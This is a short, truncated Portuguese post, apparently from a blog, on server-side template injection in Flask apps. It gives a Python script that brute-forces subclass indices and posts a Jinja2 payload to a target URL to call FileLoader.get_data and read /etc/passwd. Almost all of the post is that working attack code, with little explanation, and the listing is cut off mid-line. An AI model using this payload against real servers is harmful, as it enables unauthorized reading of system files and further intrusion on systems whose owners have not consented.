Injeção de SSTI em aplicações Flask e como contornar
Exploração da classe FileLoader:
import requests
url = input('Digite a URL do alvo: ')
for i in range(500):
payload = f"{{{{''.__class__.__bases__[0].__subclasses__()[{i}].get_data(0, '/etc/passwd')}}}}"
try:
response = requests.post(url, data={"name": payload})
if response.status_code == 200 and '_fr ...
Publicado em 8-5 12:37